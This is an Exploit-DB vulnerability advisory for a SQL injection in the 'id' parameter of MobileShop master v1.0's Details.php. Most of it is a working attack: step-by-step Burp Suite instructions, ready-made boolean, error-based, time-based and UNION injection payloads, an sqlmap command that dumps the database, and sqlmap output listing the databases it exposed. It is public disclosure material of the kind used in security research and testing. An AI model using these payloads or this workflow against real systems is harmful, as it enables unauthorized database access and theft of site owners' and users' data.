MobileShop master v1.0 - SQL Injection Vuln.

EDB-ID:

51921

CVE:

N/A




Platform:

PHP

Date:

2024-03-25


+ Exploit Title: MobileShop master v1.0 - SQL Injection Vuln.
+ Date: 2024-13-03
+ Exploit Author: "HAZIM ARBAŞ" from EMA Security LTD - Siber Güvenlik ve Bilişim Hizmetleri (https://emasecurity.com)
+ Vendor Homepage: https://code-projects.org/mobile-shop-in-php-css-javascript-and-mysql-free-download/
+ Software Link: https://download-media.code-projects.org/2020/04/Mobile_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip
+ Tested on: Windows 10 Pro
+ CWE: CWE-89
+ CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ Type: WebApps
+ Platform: PHP

## References:
+ https://cwe.mitre.org/data/definitions/89.html
+ https://owasp.org/Top10/A03_2021-Injection/

## Description:
The MobileShop-master application is susceptible to SQL Injection through the 'id' parameter in "/MobileShop-master/Details.php". Exploiting this vulnerability could lead to severe consequences, including unauthorized access, data manipulation, and potential exploitation of other vulnerabilities within the underlying database. It is imperative to address this issue promptly to mitigate the risk of compromise and ensure the security and integrity of the application and its data.

## Proof of Concept:
+ Go to the Login page: "http://localhost/MobileShop-master/Login.html"
+ Fill email and password.
+ Select any product and intercept the request via Burp Suite, then send it to Repeater.
+ Change the 'id' value to any of the below payloads.
+ Send the request

## Payloads:
+ id=1' AND 9071=9071 AND 'EtdU'='EtdU
+ id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk
+ id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
+ Or you can write your own payloads


## Proof of Concept Using SqlMap:
+ Go to the Login page: "http://localhormst/MobileShop-master/Login.html"
+ Fill email and password.
+ Select any product and intercept the request via Burp Suite, then send it to Repeater.
+ Copy to File the request to a "sql.txt" file.
+ Run the following sqlmap command
+ sqlmap -r sql.txt -p id --dbs


```
POST /MobileShop-master/Details.php HTTP/1.1
Host: localhost
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/MobileShop-master/MobilesList.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=mh3mnpf51bj2q17hg8sipbltnn
Connection: close

id=1
```

+ Use sqlmap to exploit. In sqlmap, use 'id' parameter to dump the database.
```
sqlmap -r sql.txt -p id --dbs
```

```
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9071=9071 AND 'EtdU'='EtdU

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7380 FROM (SELECT(SLEEP(5)))rlmI) AND 'blrN'='blrN

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[04:17:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.12, Apache 2.4.58
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:17:04] [INFO] fetching database names
[04:17:05] [INFO] resumed: 'information_schema'
[04:17:05] [INFO] resumed: '1'
[04:17:05] [INFO] resumed: '3'
[04:17:05] [INFO] resumed: 'admidio'
[04:17:05] [INFO] resumed: 'calender'
[04:17:05] [INFO] resumed: 'corregidor'
[04:17:05] [INFO] resumed: 'gym'
[04:17:05] [INFO] resumed: 'joomla_db'
[04:17:05] [INFO] resumed: 'linkstack'
[04:17:05] [INFO] resumed: 'mobileshop'
[04:17:05] [INFO] resumed: 'mysql'
[04:17:05] [INFO] resumed: 'nickey'
[04:17:05] [INFO] resumed: 'performance_schema'
[04:17:05] [INFO] resumed: 'phpmyadmin'
[04:17:05] [INFO] resumed: 'rcms'
[04:17:05] [INFO] resumed: 'smith'
[04:17:05] [INFO] resumed: 'telephone'
[04:17:05] [INFO] resumed: 'test'
[04:17:05] [INFO] resumed: 'valente'

```